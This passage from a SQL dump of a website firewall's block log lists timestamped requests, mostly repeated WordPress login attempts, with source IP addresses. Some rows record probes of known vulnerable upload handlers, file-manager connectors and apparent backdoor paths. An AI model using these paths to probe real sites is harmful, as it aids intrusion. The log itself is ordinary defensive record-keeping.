06:14:46','13.236.114.230','https://smithandsmith.co.za/wp-login.php','404shield',''),(3372,'2021-03-05 15:04:40','34.236.202.207','https://smithandsmith.co.za/wp-login.php','404shield',''),(3373,'2021-03-05 16:39:56','94.23.45.15','https://smithandsmith.co.za/wp-login.php','404shield',''),(3374,'2021-03-05 17:33:27','159.89.1.19','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3375,'2021-03-05 18:20:35','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/super-forms/uploads/php/index.php','404shield',''),(3376,'2021-03-05 20:05:19','194.209.195.102','https://smithandsmith.co.za/wp-login.php','404shield',''),(3377,'2021-03-05 22:18:41','201.142.244.179','https://smithandsmith.co.za/wp-login.php','404shield',''),(3378,'2021-03-05 22:20:02','201.142.244.179','http://smithandsmith.co.za/administrator/','adminpw',''),(3379,'2021-03-06 07:23:44','35.196.167.69','https://smithandsmith.co.za/wp-login.php','404shield',''),(3380,'2021-03-06 09:57:32','51.75.127.48','https://smithandsmith.co.za/wp-login.php','404shield',''),(3381,'2021-03-06 18:24:23','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php','404shield',''),(3382,'2021-03-07 05:14:34','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/super-forms/uploads/php/index.php','404shield',''),(3383,'2021-03-07 06:43:01','165.22.252.197','https://smithandsmith.co.za/wp-login.php','404shield',''),(3384,'2021-03-07 09:54:36','45.176.169.126','https://smithandsmith.co.za/wp-login.php','404shield',''),(3385,'2021-03-07 09:54:43','45.176.169.126','https://smithandsmith.co.za/wp-login.php','404shield',''),(3386,'2021-03-07 09:54:49','45.176.169.126','https://smithandsmith.co.za/wp-login.php','404shield',''),(3387,'2021-03-07 18:44:16','37.59.141.40','https://smithandsmith.co.za/wp-login.php','404shield',''),(3388,'2021-03-07 18:44:16','37.59.141.40','https://smithandsmith.co.za/wp-login.php','404shield',''),(3389,'2021-03-08 00:20:56','14.160.37.198','https://smithandsmith.co.za/wp-login.php','404shield',''),(3390,'2021-03-08 00:21:03','14.160.37.198','https://smithandsmith.co.za/wp-login.php','404shield',''),(3391,'2021-03-08 00:21:09','14.160.37.198','https://smithandsmith.co.za/wp-login.php','404shield',''),(3392,'2021-03-08 16:08:00','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/super-forms/uploads/php/index.php','404shield',''),(3393,'2021-03-08 19:12:16','51.140.119.147','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3394,'2021-03-08 20:50:36','138.128.216.120','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3395,'2021-03-09 01:27:08','187.58.132.251','https://smithandsmith.co.za/wp-login.php','404shield',''),(3396,'2021-03-09 01:27:14','187.58.132.251','https://smithandsmith.co.za/wp-login.php','404shield',''),(3397,'2021-03-09 01:27:20','187.58.132.251','https://smithandsmith.co.za/wp-login.php','404shield',''),(3398,'2021-03-09 06:21:04','45.176.170.238','https://smithandsmith.co.za/wp-login.php','404shield',''),(3399,'2021-03-09 06:21:11','45.176.170.238','https://smithandsmith.co.za/wp-login.php','404shield',''),(3400,'2021-03-09 06:21:18','45.176.170.238','https://smithandsmith.co.za/wp-login.php','404shield',''),(3401,'2021-03-09 18:35:13','129.213.203.59','https://smithandsmith.co.za/wp-login.php','404shield',''),(3402,'2021-03-09 20:45:17','186.200.128.78','https://smithandsmith.co.za/wp-login.php','404shield',''),(3403,'2021-03-09 20:45:23','186.200.128.78','https://smithandsmith.co.za/wp-login.php','404shield',''),(3404,'2021-03-09 20:45:29','186.200.128.78','https://smithandsmith.co.za/wp-login.php','404shield',''),(3405,'2021-03-09 21:15:01','170.254.87.22','https://smithandsmith.co.za/wp-login.php','404shield',''),(3406,'2021-03-09 21:15:08','170.254.87.22','https://smithandsmith.co.za/wp-login.php','404shield',''),(3407,'2021-03-09 21:15:14','170.254.87.22','https://smithandsmith.co.za/wp-login.php','404shield',''),(3408,'2021-03-10 19:34:50','196.22.132.68','https://smithandsmith.co.za/wp-login.php','404shield',''),(3409,'2021-03-11 08:34:40','18.136.72.135','https://smithandsmith.co.za/wp-login.php','404shield',''),(3410,'2021-03-11 15:17:19','52.65.15.196','https://smithandsmith.co.za/wp-login.php','404shield',''),(3411,'2021-03-11 17:06:53','167.71.102.17','https://smithandsmith.co.za/wp-login.php','404shield',''),(3412,'2021-03-11 21:52:45','14.160.37.198','https://smithandsmith.co.za/wp-login.php','404shield',''),(3413,'2021-03-11 21:52:51','14.160.37.198','https://smithandsmith.co.za/wp-login.php','404shield',''),(3414,'2021-03-11 21:52:57','14.160.37.198','https://smithandsmith.co.za/wp-login.php','404shield',''),(3415,'2021-03-11 22:38:50','193.32.76.20','https://smithandsmith.co.za/wp-login.php','404shield',''),(3416,'2021-03-11 22:39:03','193.32.76.20','https://smithandsmith.co.za/wp-login.php','404shield',''),(3417,'2021-03-11 22:39:18','193.32.76.20','https://smithandsmith.co.za/wp-login.php','404shield',''),(3418,'2021-03-13 06:37:33','157.245.73.56','https://smithandsmith.co.za/wp-login.php','404shield',''),(3419,'2021-03-13 06:37:33','157.245.73.56','https://smithandsmith.co.za/wp-login.php','404shield',''),(3420,'2021-03-13 09:52:33','104.244.74.55','https://smithandsmith.co.za/wp-login.php','404shield',''),(3421,'2021-03-13 09:52:35','104.244.74.55','https://smithandsmith.co.za/wp-login.php','404shield',''),(3422,'2021-03-13 09:52:37','104.244.74.55','https://smithandsmith.co.za/wp-login.php','404shield',''),(3423,'2021-03-14 12:45:48','187.189.43.142','https://smithandsmith.co.za/wp-login.php','404shield',''),(3424,'2021-03-14 12:46:00','187.189.43.142','https://smithandsmith.co.za/wp-login.php','404shield',''),(3425,'2021-03-14 12:46:12','187.189.43.142','https://smithandsmith.co.za/wp-login.php','404shield',''),(3426,'2021-03-14 15:34:26','52.64.112.40','https://smithandsmith.co.za/wp-login.php','404shield',''),(3427,'2021-03-15 17:30:05','13.70.199.80','https://smithandsmith.co.za/wp-login.php','404shield',''),(3428,'2021-03-15 17:30:05','13.70.199.80','https://smithandsmith.co.za/wp-login.php','404shield',''),(3429,'2021-03-16 01:47:39','89.163.143.8','https://smithandsmith.co.za/wp-login.php','404shield',''),(3430,'2021-03-16 01:47:41','89.163.143.8','https://smithandsmith.co.za/wp-login.php','404shield',''),(3431,'2021-03-16 01:47:43','89.163.143.8','https://smithandsmith.co.za/wp-login.php','404shield',''),(3432,'2021-03-16 08:19:14','135.148.33.64','https://smithandsmith.co.za/wp-login.php','404shield',''),(3433,'2021-03-16 08:19:17','135.148.33.64','https://smithandsmith.co.za/wp-login.php','404shield',''),(3434,'2021-03-16 08:19:19','135.148.33.64','https://smithandsmith.co.za/wp-login.php','404shield',''),(3435,'2021-03-16 19:22:28','46.101.254.193','https://smithandsmith.co.za/wp-login.php','404shield',''),(3436,'2021-03-16 19:22:28','46.101.254.193','https://smithandsmith.co.za/wp-login.php','404shield',''),(3437,'2021-03-17 13:04:28','185.220.101.5','https://smithandsmith.co.za/wp-login.php','404shield',''),(3438,'2021-03-17 13:04:30','185.220.101.5','https://smithandsmith.co.za/wp-login.php','404shield',''),(3439,'2021-03-17 13:04:32','185.220.101.5','https://smithandsmith.co.za/wp-login.php','404shield',''),(3440,'2021-03-17 18:03:07','137.74.206.80','https://smithandsmith.co.za/wp-login.php','404shield',''),(3441,'2021-03-18 07:34:41','145.239.91.37','https://smithandsmith.co.za/wp-login.php','404shield',''),(3442,'2021-03-18 07:34:46','145.239.91.37','https://smithandsmith.co.za/wp-login.php','404shield',''),(3443,'2021-03-18 07:34:49','145.239.91.37','https://smithandsmith.co.za/wp-login.php','404shield',''),(3444,'2021-03-18 08:29:47','87.120.37.79','https://smithandsmith.co.za/wp-login.php','404shield',''),(3445,'2021-03-18 08:29:50','87.120.37.79','https://smithandsmith.co.za/wp-login.php','404shield',''),(3446,'2021-03-18 08:29:53','87.120.37.79','https://smithandsmith.co.za/wp-login.php','404shield',''),(3447,'2021-03-18 08:30:03','51.195.42.226','https://smithandsmith.co.za/wp-login.php','404shield',''),(3448,'2021-03-18 15:52:41','45.148.10.54','https://smithandsmith.co.za/wp-login.php','404shield',''),(3449,'2021-03-18 15:52:43','45.148.10.54','https://smithandsmith.co.za/wp-login.php','404shield',''),(3450,'2021-03-18 15:52:44','45.148.10.54','https://smithandsmith.co.za/wp-login.php','404shield',''),(3451,'2021-03-18 15:52:53','185.121.69.16','https://smithandsmith.co.za/wp-login.php','404shield',''),(3452,'2021-03-18 18:49:39','192.153.57.25','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=heartbeat','404shield',''),(3453,'2021-03-19 09:33:03','65.1.165.29','https://smithandsmith.co.za/wp-login.php','404shield',''),(3454,'2021-03-19 21:56:36','51.195.103.74','https://smithandsmith.co.za/wp-login.php','404shield',''),(3455,'2021-03-19 21:56:39','51.195.103.74','https://smithandsmith.co.za/wp-login.php','404shield',''),(3456,'2021-03-19 21:56:46','51.195.103.74','https://smithandsmith.co.za/wp-login.php','404shield',''),(3457,'2021-03-19 23:02:59','78.111.7.103','https://smithandsmith.co.za/wp-login.php','404shield',''),(3458,'2021-03-20 08:10:04','51.79.146.233','https://smithandsmith.co.za/wp-login.php','404shield',''),(3459,'2021-03-20 14:55:37','195.176.3.19','https://smithandsmith.co.za/wp-login.php','404shield',''),(3460,'2021-03-20 14:55:41','195.176.3.19','https://smithandsmith.co.za/wp-login.php','404shield',''),(3461,'2021-03-20 14:55:44','195.176.3.19','https://smithandsmith.co.za/wp-login.php','404shield',''),(3462,'2021-03-20 14:55:53','45.151.167.10','https://smithandsmith.co.za/wp-login.php','404shield',''),(3463,'2021-03-21 02:20:02','185.220.101.12','https://smithandsmith.co.za/wp-login.php','404shield',''),(3464,'2021-03-21 02:20:05','185.220.101.12','https://smithandsmith.co.za/wp-login.php','404shield',''),(3465,'2021-03-21 02:20:07','185.220.101.12','https://smithandsmith.co.za/wp-login.php','404shield',''),(3466,'2021-03-21 03:22:50','185.220.102.242','https://smithandsmith.co.za/wp-login.php','404shield',''),(3467,'2021-03-21 03:22:51','185.220.102.242','https://smithandsmith.co.za/wp-login.php','404shield',''),(3468,'2021-03-21 03:22:53','185.220.102.242','https://smithandsmith.co.za/wp-login.php','404shield',''),(3469,'2021-03-21 17:41:54','35.187.94.170','http://www.smithandsmith.co.za/','muashield',''),(3470,'2021-03-21 17:41:56','35.187.94.170','http://www.smithandsmith.co.za/','muashield',''),(3471,'2021-03-21 17:41:59','35.187.94.170','http://www.smithandsmith.co.za/','muashield',''),(3472,'2021-03-21 21:40:12','178.128.203.77','https://smithandsmith.co.za/wp-login.php','404shield',''),(3473,'2021-03-21 21:41:03','173.249.35.108','https://smithandsmith.co.za/wp-login.php','404shield',''),(3474,'2021-03-22 03:36:49','51.161.43.235','https://smithandsmith.co.za/wp-login.php','404shield',''),(3475,'2021-03-22 03:36:51','51.161.43.235','https://smithandsmith.co.za/wp-login.php','404shield',''),(3476,'2021-03-22 03:36:54','51.161.43.235','https://smithandsmith.co.za/wp-login.php','404shield',''),(3477,'2021-03-22 03:53:52','198.187.28.42','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3478,'2021-03-22 03:54:39','157.245.231.45','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3479,'2021-03-22 16:22:50','190.107.177.55','https://smithandsmith.co.za/wp-login.php','404shield',''),(3480,'2021-03-23 06:27:56','109.70.100.56','https://smithandsmith.co.za/wp-login.php','404shield',''),(3481,'2021-03-23 06:27:58','109.70.100.56','https://smithandsmith.co.za/wp-login.php','404shield',''),(3482,'2021-03-23 06:28:00','109.70.100.56','https://smithandsmith.co.za/wp-login.php','404shield',''),(3483,'2021-03-23 15:59:26','94.158.48.2','https://smithandsmith.co.za/wp-login.php','404shield',''),(3484,'2021-03-23 15:59:26','94.158.48.2','https://smithandsmith.co.za/wp-login.php','404shield',''),(3485,'2021-03-23 18:04:48','116.203.214.78','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(3486,'2021-03-23 18:04:50','116.203.214.78','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3487,'2021-03-23 18:04:52','116.203.214.78','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(3488,'2021-03-23 18:19:23','67.211.216.142','http://www.smithandsmith.co.za/','muashield',''),(3489,'2021-03-23 18:19:23','67.211.216.142','http://www.smithandsmith.co.za/','muashield',''),(3490,'2021-03-23 18:19:28','67.211.216.142','http://www.smithandsmith.co.za/index.php/component/users','sessionshield',''),(3491,'2021-03-23 21:54:06','104.244.78.231','https://smithandsmith.co.za/wp-login.php','404shield',''),(3492,'2021-03-23 21:54:10','104.244.78.231','https://smithandsmith.co.za/wp-login.php','404shield',''),(3493,'2021-03-23 21:54:12','104.244.78.231','https://smithandsmith.co.za/wp-login.php','404shield',''),(3494,'2021-03-24 03:19:38','186.31.1.255','https://smithandsmith.co.za/administrator/','adminpw',''),(3495,'2021-03-24 19:03:10','119.45.215.195','https://smithandsmith.co.za/wp-login.php','404shield',''),(3496,'2021-03-24 22:04:01','185.220.101.23','https://smithandsmith.co.za/wp-login.php','404shield',''),(3497,'2021-03-24 22:04:10','185.220.101.23','https://smithandsmith.co.za/wp-login.php','404shield',''),(3498,'2021-03-24 22:04:17','185.220.101.23','https://smithandsmith.co.za/wp-login.php','404shield',''),(3499,'2021-03-25 04:18:42','77.245.117.27','https://www.smithandsmith.co.za/wp-content/vuln.php','404shield',''),(3500,'2021-03-25 22:09:34','162.247.74.201','https://smithandsmith.co.za/wp-login.php','404shield',''),(3501,'2021-03-25 22:09:39','162.247.74.201','https://smithandsmith.co.za/wp-login.php','404shield',''),(3502,'2021-03-25 22:09:42','162.247.74.201','https://smithandsmith.co.za/wp-login.php','404shield',''),(3503,'2021-03-26 04:53:40','103.51.103.3','https://smithandsmith.co.za/wp-login.php','404shield',''),(3504,'2021-03-26 20:11:31','104.131.18.212','https://smithandsmith.co.za/wp-login.php','404shield',''),(3505,'2021-03-26 20:11:32','104.131.18.212','https://smithandsmith.co.za/wp-login.php','404shield',''),(3506,'2021-03-27 04:28:23','209.141.45.189','https://smithandsmith.co.za/wp-login.php','404shield',''),(3507,'2021-03-27 04:28:26','209.141.45.189','https://smithandsmith.co.za/wp-login.php','404shield',''),(3508,'2021-03-27 04:28:28','209.141.45.189','https://smithandsmith.co.za/wp-login.php','404shield',''),(3509,'2021-03-27 04:28:35','185.220.100.253','https://smithandsmith.co.za/wp-login.php','404shield',''),(3510,'2021-03-27 04:28:39','185.220.100.253','https://smithandsmith.co.za/wp-login.php','404shield',''),(3511,'2021-03-27 11:05:17','104.244.79.196','https://smithandsmith.co.za/wp-login.php','404shield',''),(3512,'2021-03-27 11:05:19','104.244.79.196','https://smithandsmith.co.za/wp-login.php','404shield',''),(3513,'2021-03-27 11:05:21','104.244.79.196','https://smithandsmith.co.za/wp-login.php','404shield',''),(3514,'2021-03-28 15:56:10','188.65.238.117','https://smithandsmith.co.za/index.php/component/users','sessionshield',''),(3515,'2021-03-28 20:54:34','116.203.214.78','http://www.smithandsmith.co.za/administrator/','adminpw',''),(3516,'2021-03-28 20:56:01','116.203.214.78','http://www.smithandsmith.co.za/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form','dfishield',''),(3517,'2021-03-28 20:56:09','116.203.214.78','http://www.smithandsmith.co.za/administrator/components/com_rokdownloads/assets/uploadhandler.php','dfishield',''),(3518,'2021-03-29 04:41:37','87.118.116.90','https://smithandsmith.co.za/wp-login.php','404shield',''),(3519,'2021-03-29 04:41:39','87.118.116.90','https://smithandsmith.co.za/wp-login.php','404shield',''),(3520,'2021-03-29 04:41:42','87.118.116.90','https://smithandsmith.co.za/wp-login.php','404shield',''),(3521,'2021-03-29 04:41:49','51.15.235.211','https://smithandsmith.co.za/wp-login.php','404shield',''),(3522,'2021-03-29 04:41:51','51.15.235.211','https://smithandsmith.co.za/wp-login.php','404shield',''),(3523,'2021-03-29 10:25:11','185.220.101.19','https://smithandsmith.co.za/wp-login.php','404shield',''),(3524,'2021-03-29 10:25:13','185.220.101.19','https://smithandsmith.co.za/wp-login.php','404shield',''),(3525,'2021-03-29 10:25:14','185.220.101.19','https://smithandsmith.co.za/wp-login.php','404shield',''),(3526,'2021-03-30 02:23:55','185.81.157.172','https://smithandsmith.co.za/wp-admin/install.php','404shield',''),(3527,'2021-03-30 15:50:09','111.230.150.139','https://smithandsmith.co.za/wp-login.php','404shield',''),(3528,'2021-03-30 15:50:09','111.230.150.139','https://smithandsmith.co.za/wp-login.php','404shield',''),(3529,'2021-03-31 18:19:05','103.83.81.53','https://smithandsmith.co.za/wp-login.php','404shield',''),(3530,'2021-04-01 07:59:15','159.89.167.138','https://smithandsmith.co.za/wp-login.php','404shield',''),(3531,'2021-04-01 16:46:46','167.172.56.36','https://smithandsmith.co.za/wp-login.php','404shield',''),(3532,'2021-04-01 17:27:54','159.203.82.176','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3533,'2021-04-01 18:57:15','45.154.255.75','https://smithandsmith.co.za/wp-login.php','404shield',''),(3534,'2021-04-01 18:57:18','45.154.255.75','https://smithandsmith.co.za/wp-login.php','404shield',''),(3535,'2021-04-01 18:57:20','45.154.255.75','https://smithandsmith.co.za/wp-login.php','404shield',''),(3536,'2021-04-02 02:10:48','176.10.99.200','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(3537,'2021-04-02 02:10:49','176.10.99.200','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(3538,'2021-04-02 02:10:49','176.10.99.200','http://smithandsmith.co.za/wp-login.php','httpbl',''),(3539,'2021-04-02 05:45:09','23.129.64.253','https://smithandsmith.co.za/wp-login.php','404shield',''),(3540,'2021-04-02 05:45:11','23.129.64.253','https://smithandsmith.co.za/wp-login.php','404shield',''),(3541,'2021-04-02 05:45:14','23.129.64.253','https://smithandsmith.co.za/wp-login.php','404shield',''),(3542,'2021-04-02 13:48:26','185.220.101.195','https://smithandsmith.co.za/wp-login.php','404shield',''),(3543,'2021-04-02 13:48:28','185.220.101.195','https://smithandsmith.co.za/wp-login.php','404shield',''),(3544,'2021-04-02 13:48:30','185.220.101.195','https://smithandsmith.co.za/wp-login.php','404shield',''),(3545,'2021-04-02 14:09:31','178.33.234.205','https://smithandsmith.co.za/wp-login.php','404shield',''),(3546,'2021-04-02 14:09:35','178.33.234.205','https://smithandsmith.co.za/wp-login.php','404shield',''),(3547,'2021-04-02 16:46:13','109.70.100.59','https://smithandsmith.co.za/wp-login.php','404shield',''),(3548,'2021-04-02 16:46:15','109.70.100.59','https://smithandsmith.co.za/wp-login.php','404shield',''),(3549,'2021-04-02 16:46:17','109.70.100.59','https://smithandsmith.co.za/wp-login.php','404shield',''),(3550,'2021-04-02 16:46:25','62.210.105.116','https://smithandsmith.co.za/wp-login.php','404shield',''),(3551,'2021-04-03 04:38:27','185.220.101.130','https://smithandsmith.co.za/wp-login.php','404shield',''),(3552,'2021-04-03 04:38:40','185.220.101.130','https://smithandsmith.co.za/wp-login.php','404shield',''),(3553,'2021-04-03 04:38:51','185.220.101.130','https://smithandsmith.co.za/wp-login.php','404shield',''),(3554,'2021-04-03 17:55:38','18.194.196.202','https://smithandsmith.co.za/wp-login.php','404shield',''),(3555,'2021-04-03 20:31:47','149.202.8.66','https://smithandsmith.co.za/wp-login.php','404shield',''),(3556,'2021-04-04 15:38:48','198.12.250.8','https://smithandsmith.co.za/wp-login.php','404shield',''),(3557,'2021-04-04 15:38:48','198.12.250.8','https://smithandsmith.co.za/wp-login.php','404shield',''),(3558,'2021-04-05 00:56:59','185.99.3.32','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(3559,'2021-04-05 00:57:00','185.99.3.32','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(3560,'2021-04-05 00:57:01','185.99.3.32','http://smithandsmith.co.za/wp-login.php','httpbl',''),(3561,'2021-04-05 00:57:18','104.244.72.248','https://smithandsmith.co.za/wp-login.php','404shield',''),(3562,'2021-04-05 00:57:21','104.244.72.248','https://smithandsmith.co.za/wp-login.php','404shield',''),(3563,'2021-04-05 00:57:23','104.244.72.248','https://smithandsmith.co.za/wp-login.php','404shield',''),(3564,'2021-04-05 01:11:41','199.249.230.147','https://smithandsmith.co.za/wp-login.php','404shield',''),(3565,'2021-04-05 01:11:44','199.249.230.147','https://smithandsmith.co.za/wp-login.php','404shield',''),(3566,'2021-04-05 01:11:47','199.249.230.147','https://smithandsmith.co.za/wp-login.php','404shield',''),(3567,'2021-04-05 01:30:41','109.70.100.48','https://smithandsmith.co.za/wp-login.php','404shield',''),(3568,'2021-04-05 01:30:43','109.70.100.48','https://smithandsmith.co.za/wp-login.php','404shield',''),(3569,'2021-04-05 01:30:47','109.70.100.48','https://smithandsmith.co.za/wp-login.php','404shield',''),(3570,'2021-04-05 06:43:19','102.130.121.179','https://smithandsmith.co.za/wp-login.php','404shield',''),(3571,'2021-04-05 11:27:48','109.70.100.51','https://smithandsmith.co.za/wp-login.php','404shield',''),(3572,'2021-04-05 11:27:50','109.70.100.51','https://smithandsmith.co.za/wp-login.php','404shield',''),(3573,'2021-04-05 11:27:52','109.70.100.51','https://smithandsmith.co.za/wp-login.php','404shield',''),(3574,'2021-04-05 11:27:59','198.98.57.230','https://smithandsmith.co.za/wp-login.php','404shield',''),(3575,'2021-04-05 11:28:02','198.98.57.230','https://smithandsmith.co.za/wp-login.php','404shield',''),(3576,'2021-04-05 15:26:29','13.58.56.77','https://smithandsmith.co.za/wp-login.php','404shield',''),(3577,'2021-04-05 23:05:34','185.220.101.147','https://smithandsmith.co.za/wp-login.php','404shield',''),(3578,'2021-04-05 23:05:36','185.220.101.147','https://smithandsmith.co.za/wp-login.php','404shield',''),(3579,'2021-04-05 23:05:39','185.220.101.147','https://smithandsmith.co.za/wp-login.php','404shield',''),(3580,'2021-04-05 23:05:51','23.129.64.235','https://smithandsmith.co.za/wp-login.php','404shield',''),(3581,'2021-04-05 23:05:54','23.129.64.235','https://smithandsmith.co.za/wp-login.php','404shield',''),(3582,'2021-04-06 02:20:20','162.219.250.31','https://smithandsmith.co.za/wp-login.php','404shield',''),(3583,'2021-04-06 02:20:20','162.219.250.31','https://smithandsmith.co.za/wp-login.php','404shield',''),(3584,'2021-04-06 05:23:10','109.70.100.46','https://smithandsmith.co.za/wp-login.php','404shield',''),(3585,'2021-04-06 05:23:12','109.70.100.46','https://smithandsmith.co.za/wp-login.php','404shield',''),(3586,'2021-04-06 05:23:14','109.70.100.46','https://smithandsmith.co.za/wp-login.php','404shield',''),(3587,'2021-04-06 10:08:04','46.19.141.85','https://smithandsmith.co.za/wp-login.php','404shield',''),(3588,'2021-04-06 10:08:07','46.19.141.85','https://smithandsmith.co.za/wp-login.php','404shield',''),(3589,'2021-04-06 10:08:09','46.19.141.85','https://smithandsmith.co.za/wp-login.php','404shield',''),(3590,'2021-04-06 11:53:30','54.38.22.61','https://smithandsmith.co.za/wp-login.php','404shield',''),(3591,'2021-04-06 11:53:32','54.38.22.61','https://smithandsmith.co.za/wp-login.php','404shield',''),(3592,'2021-04-06 11:53:35','54.38.22.61','https://smithandsmith.co.za/wp-login.php','404shield',''),(3593,'2021-04-06 16:16:25','109.70.100.44','https://smithandsmith.co.za/wp-login.php','404shield',''),(3594,'2021-04-06 16:16:28','109.70.100.44','https://smithandsmith.co.za/wp-login.php','404shield',''),(3595,'2021-04-06 16:16:30','109.70.100.44','https://smithandsmith.co.za/wp-login.php','404shield',''),(3596,'2021-04-07 00:42:12','51.15.250.93','https://smithandsmith.co.za/wp-login.php','404shield',''),(3597,'2021-04-07 00:42:14','51.15.250.93','https://smithandsmith.co.za/wp-login.php','404shield',''),(3598,'2021-04-07 00:42:16','51.15.250.93','https://smithandsmith.co.za/wp-login.php','404shield',''),(3599,'2021-04-07 01:58:03','185.248.160.65','https://smithandsmith.co.za/wp-login.php','404shield',''),(3600,'2021-04-07 01:58:05','185.248.160.65','https://smithandsmith.co.za/wp-login.php','404shield',''),(3601,'2021-04-07 01:58:08','185.248.160.65','https://smithandsmith.co.za/wp-login.php','404shield',''),(3602,'2021-04-07 03:55:41','160.251.4.88','https://smithandsmith.co.za/wp-login.php','404shield',''),(3603,'2021-04-07 04:43:55','18.197.125.181','https://smithandsmith.co.za/wp-login.php','404shield',''),(3604,'2021-04-07 04:47:45','185.220.101.6','https://smithandsmith.co.za/wp-login.php','404shield',''),(3605,'2021-04-07 04:47:49','185.220.101.6','https://smithandsmith.co.za/wp-login.php','404shield',''),(3606,'2021-04-07 04:47:51','185.220.101.6','https://smithandsmith.co.za/wp-login.php','404shield',''),(3607,'2021-04-07 04:47:59','185.220.101.141','https://smithandsmith.co.za/wp-login.php','404shield',''),(3608,'2021-04-07 05:33:08','173.249.35.108','https://smithandsmith.co.za/wp-login.php','404shield',''),(3609,'2021-04-08 01:02:58','3.8.12.221','https://smithandsmith.co.za/wp-login.php','404shield',''),(3610,'2021-04-08 09:37:42','13.58.56.77','https://smithandsmith.co.za/wp-login.php','404shield',''),(3611,'2021-04-08 12:03:58','185.220.101.7','https://smithandsmith.co.za/wp-login.php','404shield',''),(3612,'2021-04-08 12:04:04','185.220.101.7','https://smithandsmith.co.za/wp-login.php','404shield',''),(3613,'2021-04-08 12:04:12','185.220.101.7','https://smithandsmith.co.za/wp-login.php','404shield',''),(3614,'2021-04-08 22:19:11','198.27.82.45','https://smithandsmith.co.za/wp-login.php','404shield',''),(3615,'2021-04-09 03:15:40','193.239.232.102','https://smithandsmith.co.za/wp-login.php','404shield',''),(3616,'2021-04-09 03:15:42','193.239.232.102','https://smithandsmith.co.za/wp-login.php','404shield',''),(3617,'2021-04-09 03:15:44','193.239.232.102','https://smithandsmith.co.za/wp-login.php','404shield',''),(3618,'2021-04-09 06:41:30','185.220.100.246','https://smithandsmith.co.za/wp-login.php','404shield',''),(3619,'2021-04-09 06:41:32','185.220.100.246','https://smithandsmith.co.za/wp-login.php','404shield',''),(3620,'2021-04-09 06:41:34','185.220.100.246','https://smithandsmith.co.za/wp-login.php','404shield',''),(3621,'2021-04-09 06:41:39','37.187.196.70','http://smithandsmith.co.za/wp-login.php','httpbl',''),(3622,'2021-04-09 06:41:40','37.187.196.70','http://smithandsmith.co.za/wp-login.php','httpbl',''),(3623,'2021-04-11 05:27:06','213.184.28.33','https://smithandsmith.co.za/wp-login.php','404shield',''),(3624,'2021-04-11 05:54:04','178.175.131.194','https://smithandsmith.co.za/wp-login.php','404shield',''),(3625,'2021-04-11 05:54:07','178.175.131.194','https://smithandsmith.co.za/wp-login.php','404shield',''),(3626,'2021-04-11 05:54:11','178.175.131.194','https://smithandsmith.co.za/wp-login.php','404shield',''),(3627,'2021-04-11 13:31:54','3.210.26.121','https://smithandsmith.co.za/wp-login.php','404shield',''),(3628,'2021-04-11 14:51:33','159.203.37.43','https://smithandsmith.co.za/wp-login.php','404shield',''),(3629,'2021-04-11 15:53:41','51.79.176.221','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3630,'2021-04-11 17:41:47','104.244.74.235','https://smithandsmith.co.za/wp-login.php','404shield',''),(3631,'2021-04-11 17:41:50','104.244.74.235','https://smithandsmith.co.za/wp-login.php','404shield',''),(3632,'2021-04-11 17:41:52','104.244.74.235','https://smithandsmith.co.za/wp-login.php','404shield',''),(3633,'2021-04-12 04:44:20','139.155.249.13','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3634,'2021-04-12 10:16:23','185.86.180.163','https://smithandsmith.co.za/wp-login.php','404shield',''),(3635,'2021-04-12 13:21:40','40.87.70.212','https://smithandsmith.co.za/wp-content/plugins/apikey/apikey.php?test=hello','404shield',''),(3636,'2021-04-12 13:22:07','40.87.70.212','https://smithandsmith.co.za/wp-content/plugins/apikey/apikey.php.suspected?test=hello','404shield',''),(3637,'2021-04-12 19:24:58','207.244.236.56','https://smithandsmith.co.za/wp-login.php','404shield',''),(3638,'2021-04-12 19:24:58','207.244.236.56','https://smithandsmith.co.za/wp-login.php','404shield',''),(3639,'2021-04-13 08:58:30','139.155.2.183','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3640,'2021-04-13 14:56:42','185.220.101.132','https://smithandsmith.co.za/wp-login.php','404shield',''),(3641,'2021-04-13 14:56:44','185.220.101.132','https://smithandsmith.co.za/wp-login.php','404shield',''),(3642,'2021-04-13 14:56:46','185.220.101.132','https://smithandsmith.co.za/wp-login.php','404shield',''),(3643,'2021-04-13 18:29:45','167.71.154.15','https://smithandsmith.co.za/wp-login.php','404shield',''),(3644,'2021-04-14 12:42:05','45.154.255.70','https://smithandsmith.co.za/wp-login.php','404shield',''),(3645,'2021-04-14 12:42:07','45.154.255.70','https://smithandsmith.co.za/wp-login.php','404shield',''),(3646,'2021-04-14 12:42:09','45.154.255.70','https://smithandsmith.co.za/wp-login.php','404shield',''),(3647,'2021-04-14 12:42:19','198.251.80.157','https://smithandsmith.co.za/wp-login.php','404shield',''),(3648,'2021-04-14 14:59:54','142.93.179.72','https://smithandsmith.co.za/wp-login.php','404shield',''),(3649,'2021-04-14 16:58:22','106.0.38.42','https://smithandsmith.co.za/wp-login.php','404shield',''),(3650,'2021-04-15 12:14:32','176.10.99.200','https://smithandsmith.co.za/wp-login.php','404shield',''),(3651,'2021-04-15 12:14:34','176.10.99.200','https://smithandsmith.co.za/wp-login.php','404shield',''),(3652,'2021-04-15 12:14:36','176.10.99.200','https://smithandsmith.co.za/wp-login.php','404shield',''),(3653,'2021-04-15 12:14:43','185.100.87.250','https://smithandsmith.co.za/wp-login.php','404shield',''),(3654,'2021-04-15 